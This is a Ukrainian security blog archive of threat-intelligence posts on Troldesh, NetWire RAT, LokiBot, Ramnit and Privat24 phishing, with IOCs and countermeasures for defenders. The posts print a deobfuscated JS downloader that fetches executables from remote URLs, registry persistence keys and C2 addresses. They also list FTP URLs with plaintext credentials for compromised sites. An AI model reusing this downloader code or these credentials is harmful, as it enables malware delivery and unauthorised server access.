Tag Archive | phishing

MVISION Mobile – частина друга

Більшість організацій зазнали невдачі при спробі запровадити MDM.
MVISION Mobile пропонує простіший спосіб захисту пристроїв та своєчасного виявлення потенційних загроз.

Отже, як і обіцяв у попередньому відео, тепер покажу на що здатен MVISION Mobile Advanced без інтеграції з MDM.

23 хв контенту: мінімум слайдів, максимум екшену.  В меню: три сценарії типових загроз, кастомізація політик, захист від фішингу, реакція на незахищену точку доступу та інше. А в кінці відео – анонс наступного матеріалу, який вже на підході. Не перемикайтеся.

Приємного перегляду.

Відео:

Слайди:

Кому не зручно із slideshare ось вам PDF (~ 0,7 Mb)

Будьте уважні та обережні.

VR

IOC_troldesh_ransom_120918

(!) оновлено 13/09 – додані маркери (адреси, IP)

Доброго вечора, панове.

Сьогодні о другій половині дня проходила масова розсилка #Troldesh Ransomware.

Рівень загрози – високий!, для організацій, що прислухалися до наших попередніх рекомендацій – низький.

УВАГА! Зловмисники застосовують нову схему доставки.

Трохи аналітики:

  • Замість скриптів чи документів із приєднання цього разу розповсюджують через посилання на FTP
  • Після активації посилання жертва отримує SCR у оболонці ZIP
  • FTP джерела різні, контрольні суми архівів та SCR відрізняються (як мінімум 2 набори)
  • payload не кодований (!This program cannot be run in DOS mode.)
  • Зразок закріплюється в системі і шифрування починає із затримкою 10-15 хв
  • Затримка дозволяє обходити онлайн sandbox у яких час перевірки лімітований
  • Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload детектуються по GTI.

Схема атаки:

email > URL > FTP > ZIP > SCR > %temp% > Program Data\Windows\csrss.exe

Маркери IOC:

Приклади листів із посиланням на FTP джерела:

Теми листів:(оновлено 13/09)

Платіжна інформація 9/12/2018
інформація 6065341
інформація 2194379
інформація 2836783
інформація 1438232
ЗВIТ ПЛЮС

Адреси серверів з яких велась розсилка: (оновлено 13/09)

66.60.130.30
194.79.65.168
72.52.210.40
212.54.57.98
212.54.57.99
212.54.57.96

Скриньки з яких велася розсилка: (оновлено 13/09)

a.igor@arcor.de
silke.berg@arcor.de
murdock3@arcor.de
janinacaspers@arcor.de
kaierle@arcor.de
nadaf@arcor.de
clemo.w@arcor.de
elli.winter@arcor.de
neke81@arcor.de
denis.pielka@arcor.de
kasten.m@arcor.de
onkel-mike@arcor.de
oli-gerhard@arcor.de
ge-47se@arcor.de
ronnsen_g@arcor.de
stkroeger@arcor.de
fabian.schossau@arcor.de
franz216@arcor.de
okamerlog@arcor.de
chrissifuessel@arcor.de
sternentreiber@arcor.de
kd-53@arcor.de
thwagner@arcor.de
thomas.croy@arcor.de
j.zynda@arcor.de
stevesteel@arcor.de
arslanu@arcor.de
thwagner@arcor.de
cojahn@arcor.de
eadavid@arcor.de
philippklemm@arcor.de
roland.steurer@arcor.de
badneo@arcor.de
c.burbach@arcor.de
lars.sylvia@arcor.de
michappe2@arcor.de
johannes.steinbrecher@arcor.de
amiri111@arcor.de
vincentschwiedeps@arcor.de
oezdinc@arcor.de
varan@arcor.de
tobisperling@arcor.de
silke.berg@arcor.de
fabianahrens@arcor.de
andy-lieb@arcor.de
markxy2@arcor.de
tibe99@arcor.de
rosenstolz-100@arcor.de
rolf.kissel@arcor.de
raimondkiess@arcor.de
danielkempgen@arcor.de
vo-zi@arcor.de
dubidubidam@arcor.de
peterbartzsen@arcor.de
cjonientz@arcor.de
thomasvogt1@arcor.de
botbot@arcor.de
carstenconstabel@arcor.de
t.rick@arcor.de
c_ortiz@arcor.de
spamfelix@arcor.de
f.paul.pp@arcor.de
lars.sylvia@arcor.de
batyr4@arcor.de
cytomic@arcor.de
sebastian.strobl@arcor.de
robert.kagan@arcor.de
mario.muehlbach@arcor.de
a.igor@arcor.de
exog@arcor.de
derglagla@arcor.de
brharun@arcor.de
samed.yilmaz@arcor.de
bernhardschild1@arcor.de

ruim13@iol.pt
j.belem@iol.pt
jmaia79@iol.pt
angelo.c@iol.pt
neoteo@iol.pt
ampimenta@iol.pt
manuelmonteiro1974@iol.pt
siriusgrey@iol.pt
joaonn13@iol.pt
onapp@iol.pt
hugo_china@iol.pt
gtdesk@iol.pt
claudia_ferreir@iol.pt
filipe.t@iol.pt
fpimentel@iol.pt
nina_faria@iol.pt
ricksilva@iol.pt
jm3ze@iol.pt
tfcoelho@iol.pt
anakar1@iol.pt
ritaportela@iol.pt
ndsous@iol.pt
olga_rodrigues@iol.pt

j.morgan06@blueyonder.co.uk
lf012r2929@blueyonder.co.uk

tiff1pets@reliable-mail.com
bre90oplign@reliable-mail.com
bre90oplign@reliable-mail.com

qpecota@surewest.net
chairman@phoenixhc.co.uk

stolen@ghettojam.net
ian.p.hamilton@virgin.net
robiwahn@vodafone.de
engelchen1959@alice.de
p-morell@stofanet.dk
sara@woodsidestables.com

Адреси FTP: (оновлено 13/09)

f11p:\makoblue:london92@www.makoblue{.} com.au/public_html/2018/administrator/components/com_joomdoc/libraries/joomdoc/html/123-info001.zip
f11p:\freedomp:E8o1s8qpW5@freedompublishing{.} com.au/.trash/HTML/eoplata007.zip
f11p:\wontasti:85221064@ftp.wontastic{.} com/.htpasswds/public_html/0297_docs_tre_88.zip
f11p:\wontasti:85221064@ftp.wontastic{.} com/.trash/kitchen/wp-content/plugins/jetpack/modules/minileven/images/docs_spwo_374.zip
f11p:\j0elb:d3al4@users.tpg.com{.} au/selattyncottages/images/docs_spwo_374.zip
f11p:\mergit.com{.} au:a1d4nm143y@s46950.gridserver{.} com/domains/mergit.com{.} au/html/mergit/v00.01.13/tmp/Prvd_docs.zip
f11p:\wontasti:85221064@ftp.wontastic{.} com/.trash/kitchen/wp-content/plugins/meeting-scheduler-by-vcita/images/docs_spwo_374.zip
f11p:\sbbccom/#?-bWZ(Z_v3;@ftp.sbbc.com{.} au/.cagefs/var/cache/php-opcache/d949132ff7e5a1b34f35758ccce8ff12/home/sbbccom/public_html/mngd001.zip
f11p:\zvillanovaplaye:ATWaS1948@villanovaplayers{.} com/httpdocs/images/Prvd_docs.zip
f11p:\f189031:s3yn9bsk@cpfacilitation.com{.} au/webspace/httpdocs/wordpress/wp-content/plugins/contact-form-7/images/Prvd_docs.zip
f11p:\topuksto:zrhqh3j1ka4q19la@europa.servers.rbl-mer.misp.co{.} uk/mail/ukbargaincentral.com/steve.bartlett/.Sent/tmp/docs_spwo_374.zip
f11p:\dabaco:RqPid6!!!H0Iz5f@ftp.dabaco.com{.} au/public_html/administrator/components/com_admin/helpers/html/0297_docs_tre_88.zip
f11p:\topuksto:zrhqh3j1ka4q19la@ftp.ukbargaincentral{.} com/mail/ukbargaincentral.com/steve.bartlett/.Junk/tmp/Prvd_docs.zip
f11p:\topuksto:zrhqh3j1ka4q19la@europa.servers.rbl-mer.misp.co{.} uk/mail/.Drafts/tmp/docs_spwo_374.zip
f11p:\thestore:Soot777!@thestoreroomnsw.com{.} au/public_html/administrator/templates/khepri/html/123-info001.zip
f11p:\f189031:s3yn9bsk@cpfacilitation.com{.} au/webspace/httpdocs/wordpress/wp-content/plugins/contact-form-7/images/docs_spwo_374.zip
f11p:\etrain:*!?qfP#^QgU%@e-train.com{.} au/public_html/eoplata007.zip
f11p:\bimbella:q2h1q8a8n5@ftp.bimbellabeef.com{.} au/public_html/mngd001.zip

Архіви:

SHA-256 aa819503e6fa943c7802a6fd1d14b918fd33cf9ad97fba7140cdd7742e5192bb
File name Prvd_docs.zip
File size 853.95 KB

 

SHA-256 8b9b32c0965a707f26aaa9d8c316bba46d850ef768ebd1d9f2449325a311e15c
File name mngd001.zip
File size 853.77 KB

 

SCR файли:

SHA-256 270cbd6b5c344b952eb23b3383b30c4b97dc3f5b3e7702c61bb08c19e7f0320a
File name docs_spwo_374.scr
File size 911 KB

 

SHA-256 e7f43c2e20deb45a295eb7f3774c238e29a4a89e3d2487d9f852ada216052148
File name 0297_docs_tre_88.scr
File size 911 KB

Після запуску SCR дублює своє тіло у C:\ProgramData\Windows\csrss.exe

Закріплюється через HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem

Через 10-15 хв після активації розпочинає процес шифрування файлів, зашифровані файли отримують розширення .crypted000007

Цитата із вимог про викуп:

“Вaшu файлы былu зашuфрoвaны.
Чmобы pасшифpовamь иx, Вам неoбхoдuмо omправuть kод:
85F93484188BBACD2983|833|6|8
нa элeкmрoнный адрeс VladimirScherbinin1991@gmail.com .”

Мережева активність скомпрометованої системи:

194.109.206.212	www.khfpgbxlw5p6pzvklzug{.} com		Client Hello
86.59.21.38	www.j4pl75jorexd4e{.} com		Client Hello
192.3.169.210	www.33llfq{.} com		        Client Hello

0297_docs_tre_88.scr	194.109.206.212	443	ESTABLISHED										
0297_docs_tre_88.scr	192.3.169.210	443	ESTABLISHED										
0297_docs_tre_88.scr	86.18.115.93	9001	ESTABLISHED

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Обмеження FTP з’єднань для пересічних користувачів за білим списком джерел
  • Заборона довільного завантаження додатків для пересічних користувачів на рівні Web Proxy
  • Заборона створення та зчитування/запуску *.SCR та *.EXE з каталогів профілю користувача %appdata%
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Постраждалим(!):

ID Ransomware

No More Ransom

Інструкція по розшифровці (на свій ризик!)

Будьте уважні та обережні.

VR

50 відтінків фішингу, або Руки геть із клавіатури!

Усім привіт.

Опублікували мою статтю про фішинг та як із ним боротися.

Контент орієнтований на пересічного користувача та буде корисний усім хто починає ранок із розгрібання теки “Вхідні листи”.

Бажаю приємного читання)

https://petrimazepa.com/50_vidtinkiv_fishingu_abo_ruki_get_vid_klaviaturi

VR

IOC_lzh_190718

Усім привіт.

Фіксуємо спроби доставки шкідливого коду через JS скрипти (WSH) у оболонці LZH архівів.

Нічого нового, проте у тих, хто не подбав про контроль/заборону WSH будуть проблеми.

Трохи аналітики:

  • фішинг примітивний, не персоналізований
  • скрипт один, містить два посилання
  • payload не кодований !This program cannot be run in DOS mode.
  • прав Адміністратора не потребує
  • на Office 2007 та 2010 вилітає з помилкою
  • кінцева мета payload поки не встановлена

Схема атаки

email attach lzh (JS) > WSH > GET > \Users\*\AppData\Roaming\Microsoft\Windows\Templates\random.exe

Зверніть увагу на скомпрометований сайт Полтавського обласного управління водних ресурсів, що розповсюджує malware:

Маркери

архів

SHA-256               7343bb8098af8785dfee2e9c3bb2edd109aca75a2f1a2f1890faf25a28f46029
File name            рахунок до оплати зг. дог. 57 ФОП Ушаньов Д.О.zip.lzh
File size 81.59 KB

скрипт

SHA-256               042e079b1acc7bec5076077b8d0df8582ec3b7b675e1777c3a91f3159f71ea24
File name            за оренду рах. №118 ФОП Ушаньов Д.О.xls.js
File size 57.94 KB

payload

SHA-256               3d2777b748e805c0463c0c6d0fef8280ad197bea1dd0a25e30ed71199989a6b9
File name            zakup.exe
File size 223 KB

Деобфускований скрипт:

“var path = wsh.SpecialFolders(“templates”)+”\\”+((Math.random()*999999)+9999|0)+”.exe”;

HTTP.Open(“GET”, “h11p:\poltavavodgosp{.} gov.ua/doc/zakup.exe”, false

{ HTTP.Open(“GET”, “h11p:\avtodoskadoc{.} top/zakupki/peremena.exe”, false)”

 

Мережа

194.0.200.13     poltavavodgosp{.} gov.ua     GET /doc/zakup.exe          Mozilla/4.0
149.129.215.193  avtodoskadoc{.} top          GET/zakupki/peremena.exe    Mozilla/4.0

 

Процеси

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\118.js"
"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\209790.exe"
C:\Windows\splwow64.exe 8192

Контрзаходи

  • Фільтр приєднань на рівні Email – див. тут
  • Заборона завантаження запускних на рівні Proxy – див. тут
  • Заборона створення та зчитування js, jse, vb, vbe та ін скриптових файлів в профілі користувача
  • Заборона створення та запуску нових exe в профілі користувача – див. тут
  • Заборона мережевого трафіку для WSH – див. тут
  • Деактивація WSH – див. тут
  • Фільтрація по User Agent на рівні Proxy

Будьте уважні та обережні.

VR

Приват24 – фішинг

Всім привіт.

Вчора о другій половині дня було зафіксовано хвилю SMS/MMS розсилок, що маскувалися начеб-то під квитанцію по переказу грошей через Приват24

Ось приклад повідомлення:

Якщо людина була досить необережною і переходила за скороченим посиланням, то вона опинялася на фейковій фішинговій сторінці, яка копіює вхід до Приват24.

Погляньте самі: зліва – фейк, праворуч – реальна сторінка Приват24

Фейкова сторінка, яка станом на 16ту годину вже не доступна, збирала облікові дані довірливих жертв:

Нагадую, щоб не стати жертвою шахраїв:

  1. Уважно перевіряти рядок адреси (HTTPS, SSL сертифікат)
  2. Правильність домену та сертифікату
  3. Не вводити облікові дані на підозрілих сторінках
  4. Змінити пароль
  5. Активувати двофакторну авторизацію при кожному вході

Якщо у вас є рахунок в Приват банку, щоб убезпечити ваші фінанси від шахраїв достатньо змінити пароль та активувати двофакторну авторизацію при кожному вході –

після цього, якщо навіть ви необачно введете ваш пароль та номер телефону на фішинговій сторінці, шахраї не отримають доступ до ваших рахунків.

Коротка інструкція як це зробити:

Після цього при кожному вході в Приват24 потрібне буде підтвердження:

Не станьте жертвою.

Будьте уважні та обережні.

VR

IOC_NetWire_RAT_250418

Доброго дня, панове.

Детальний звіт по сьогоднішній розсилці.

Цього разу через документи із макросами розповсюджували #NetWire RAT.

Цей тип шкідливого коду застосовується для віддаленого керування інфікованими системами.

Рівень загрози, для організацій котрі не блокують макроси, – високий, а для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Документ із макросом розмістили на Amazon AWS (знову, для обходу URL фільтрації)
  • Активація макросу відбувається при кліку на формі (Ок або “Х”)
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Завантаження та запуск основної частини відбувається процесом winword
  • Основна частина зберігається у %Public% (фактично обходять %Temp%)
  • Не потребує прав Адміністратора

Інфікування відбувається так:


І так, проблеми будуть у тих, хто:

  • Не заблокували макроси (90% держ. установ та фінансових департаментів)
  • Не заборонили трафік для winword.exe (більше 50% організацій)
  • На блокують завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)


Схема атаки:

email > URL > GET .doc > maco > GET 84.200.19.153/pen.exe > users\public\.exe

Маркери IOC:

файл приманка

SHA-256    16947cceab56ad5c98a588a23c656b8fc967702d027f8f9a0164bfc2738fc2b6
File name   Transactions_invalid001.doc
File size      425.5 KB

основна частина

SHA-256        079e3875726e57824b5357583a9ba746c5775a60c6355f5cced8024652817699
File name   pen.exe
File size      412 KB

Мережеві IOC:

Документ завантажується із Amazon AWS: (Увага! Посилання досі активне!)

h11ps://secured-banking00129.s3.amazonaws{.} com/Transactions_invalid001.doc

Основна частина завантажується із:

84.200.19.153    GET /pen.exe HTTP/1.1         Mozilla/4.0

Трафік скомпрометованої системи після запуску основної частини:

185.117.74.8      49622 → 4590 [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=256 SACK_PERM=1    TCP   66    

Активність по процесам:

Коли жертва відкриває завантажений документ-приманку запускається макрос.

Процес Winword відкриває з’єднання із 84.200.19.153 і намагається завантажити некодований payload.

Завантажений файл записується та запускається з каталогу %Public%

"C:\Program Files\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Users\operator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\...\pen[1].exe"
"C:\Users\Public\.exe"

Після запуску основна частина закріплюється через HKU:

[HKEY_USERS\S-xxx\Software\Microsoft\Windows\CurrentVersion\Run]
@="C:\\Users\\Public\\.exe"
"printer"="C:\\Users\\Public\\.exe"

(Default)    c:\users\public\.exe     4/24/2018 4:12 PM     
printer      c:\users\public\.exe     4/24/2018 4:12 PM 

Після запуску зразок відправляє SYN пакети на порт 4590 хоста 185.117.74.8:

185.117.74.8      49622 → 4590 [SYN]

Контрзаходи:

  • Перевірити журнали обладнання на наявність спроб комунікації із s3.amazonaws{.} com
  • Заборонити запуск макросів, якщо не використовуєте по роботі
  • Заборонити мережевий трафік для додатків MS Office – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Заборонити запуск дочірніх процесів для додатків MS Office (крім служби друку) користувацьке правило Access Protection (McAfee ENS)
  • Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона створення та зчитування/запуску *.EXE файлів з каталогів профілю C:\Users\**\
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталозі C:\Windows\Temp\**
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_ACE_0504-0604-18

Доброго ранку, панове.

Перед Великоднем на аналіз було надано два зразки: #lokibot та #ramnit

Обидва типи можуть застосовуватися для стеження, крадіжки облікових даних.

Рівень загрози – низький.

Трохи аналітики:

  • Обидва розповсюджувалися через масовий неперсоналізований фішинг в оболонці ACE архівів
  • В зоні ризику – користувачі WinZip, WinRAR та плагінів Total Commander
  • 7zip та вбудований архіватор по замовчуванню не відкривають АСЕ
  • #lokibot іде з розширенням .SCR – перевірте чи у вас блокується створення/запуск
  • Зловмисники комбінують способи доставки
  • Щоб обійти фільтри застосовують застарілі формати (ACE, gz, RAR v5 та інші)
  • Не потребує прав Адміністратора
  • #lokibot дає чіткий слід по мережі, а #ramnit запускає бравзер з метою приховати комунікації з С2
  • Основне тіло обох зразків детектується ENS по GTI / DAT

Схема атаки:

email > Attach (ACE) > \tmp\ *.exe (.scr)

Розпаковка обгортки одного із приєднань. Зверніть увагу на розширення payload!

 

Маркери IOC:

#lokibot

приклад фішингового листа:

SHA-256        f20d4d4c465f65b36a17a3f08921e304a66a656ae5f5b70dc39e51345013445a
File name   DHL BILL OF LADING SHIPPING DELIVERY INVOICE.ace
File size      287.39 KB

 

SHA-256        d3c61a42abc8b612cec5746b665d1ae47c95de01f11a8e88b60dfa2f57e215a4
File name   DHL BILL OF LADING SHIPPING DELIVERY INVOICE.scr (.exe .bin)
File size      641 KB

 

195.123.238.10   POST /okto/fre.php HTTP/1.0     Mozilla/4.08 (Charon; Inferno)

# # # # # # #

#ramnit

приклад фішингового листа:

SHA-256    822a6f8c74d0f89f8fa202eba3c914eb339c7cccba922ee818cf04b9a2cb9bf2
File name   po-new order_pdf.exe
File size      1.02 MB

 

SHA-256        9f62f582fc02ae7b3b5df9a8a90718a80773eed10828014cee2a938976ab056b
File name   ramnitmgr.exe
File size      220 KB

 

[System Process] waw02s07-in-f174.1e100.net http        TIME_WAIT                                                                       
[System Process] 93.184.220.29              http        TIME_WAIT

 

Контрзаходи:

  • Жорсткий фільтр передачі запускних файлів (не лише .EXE (!)) по каналам Web та Email
  • Заборона передачі ACE архівів (якщо не потрібно по роботі) по каналам Web та Email
  • Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона створення та зчитування/запуску *.EXE та *.SCR файлів з каталогів профілю C:\Users\**\ ! – правила Access Protection
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR